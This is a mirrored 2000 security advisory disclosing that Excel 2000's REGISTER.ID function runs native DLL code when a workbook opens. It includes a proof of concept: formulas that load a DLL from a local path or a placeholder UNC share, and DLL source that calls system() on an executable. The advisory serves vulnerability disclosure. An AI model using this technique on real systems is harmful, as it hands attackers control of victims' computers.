Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:432
HistoryJul 12, 2000 - 12:00 a.m.

Excel 2000 vulnerability - executing programs

2000-07-1200:00:00
vulners.com
38

Georgi Guninski security advisory #15, 2000

Excel 2000 vulnerability - executing programs

Systems affected: Excel 2000/Win98 - almost sure other versions/OSes,
have not tested
Risk: High

Disclaimer:
The opinions expressed in this advisory and program are my own and not
of any company.
The usual standard disclaimer applies, especially the fact that Georgi
Guninski
is not liable for any damages caused by direct or indirect use of the
information or functionality provided by this program.
Georgi Guninski, bears NO responsibility for content or misuse of this
program or any derivatives thereof.

Description:
Excel 2000/Windows 98 (suppose other versions are also vulnerable, have
not tested)
allows executing programs when opening an Excel Workbook (.xls file).
This may be also be exploited thru IE or Outlook.
This may lead to taking full control over user's computer.

Details:

The problem is the REGISTER.ID Excel function. It allows executing
native code from a DLL - at least the DllMain() function.
Note: this has nothing to do with VBA code - the code being executed is
native code from a DLL.
In order the exploit to work the user must be able to access a specially
designed DLL, residing either on the local disk or on a UNC share.

The code is:

-------dll3.xls--------------------------------------------
=REGISTER.ID("C:\DLL1.DLL";"dllmain";"a")
=REGISTER.ID("\\UNC\SHARE\DLL1.DLL";"dllmain";"a")

-------dll1.cpp--------------------------------------------
BOOL APIENTRY DllMain( HANDLE hModule,
DWORD ul_reason_for_call,
LPVOID lpReserved
)
{
switch( ul_reason_for_call )
{
case DLL_PROCESS_ATTACH:
// Initialize once for each new process.
// Return FALSE to fail DLL load.
// Note: For NT/2000 you may need to move the following code
outside the switch()
MessageBox(NULL, "Hello world!", "Info", MB_OK);
MessageBox(NULL, "Shall try to start: C:\\TEST.EXE\n You may
need to
create it.", "Info", MB_OK);
system("C:\\TEST.EXE");
break;

Demonstration is available at: http://www.nat.bg/~joro/excel2.html

Copyright 2000 Georgi Guninski

Regards,
Georgi Guninski
http://www.nat.bg/~joro